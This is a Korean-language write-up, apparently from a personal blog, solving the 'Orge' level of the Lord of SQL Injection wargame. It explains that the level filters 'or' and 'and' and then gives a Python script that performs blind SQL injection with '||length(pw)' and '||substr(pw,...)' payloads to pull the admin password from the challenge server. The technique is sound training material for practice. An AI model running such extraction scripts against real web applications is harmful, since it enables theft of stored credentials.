[Lord of SQL Injection] Orge

#About

[그림 1] - 문제 화면

---

#Solution

위 문제는 이전  Darkelf(http://croas.tistory.com/45)문제와 동일하게 연산자 or 과 and 를 필터링 하고 있다

이전 문제와 다른 점이라면 DB에 저장되어있는 admin에 해당하는 pw 값을 정확히 알아내는 것이 목표이며

또한 쿼리의 결과에 따라 서버에서 서로 다른 반응을 보이는 Blind SQL Injection 문제이다

[그림 2] - 쿼리 1 ( 패스워드 길이 확인 )

[그림 3] - 쿼리 2

[그림 4] - 쿼리 3

[그림 5] - 쿼리 4

[그림 6] - 쿼리 5

[그림 7] - 쿼리 6

[그림 8] - 쿼리 7

[그림 9] - 쿼리 8

[그림 10] - 쿼리 9

[그림 11] - 문제 해결

---

#Blind SQL Injection Python Code

# -*- coding:utf-8 -*-

'''
Creator = Loddy
'''

import urllib2

query_ok = "<h2>Hello admin"
key="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXZY"

print "[*] Start Search pw Length "

for len in range(1,100):
    url = 'http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27||length(pw)='+str(len)+'%23'
    request = urllib2.Request(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'})
    request.add_header("COOKIE", "PHPSESSID=9g5q9em05r8ke6d779qkg6ipm2")
    read = urllib2.urlopen(request).read()
    if read.find(query_ok) != -1:
        print "\t%s = Correct"%(len)
        length = len
        break
    else :
        print "\t%s = Incorrect"%(len)

print "\n",
print "[*] Start Search pw Value"

def find_pw(test,pw):
    url2 = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27||substr(pw," + str(pw) + ",1)='{}'%23".format(str(key[test]))
    request = urllib2.Request(url2, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'})
    request.add_header("COOKIE", "PHPSESSID=c45u9ekpnrmqctmqbocdsuead3")
    read = urllib2.urlopen(request).read()
    return read

for pw in range(1,length+1):
    for test in range(0,63):
        read = find_pw(test,pw)
        if read.find(query_ok) != -1:
            print "\t(pw,%d,1) = {}".format(key[test]) %pw
            break

[그림 12] - 코드 결과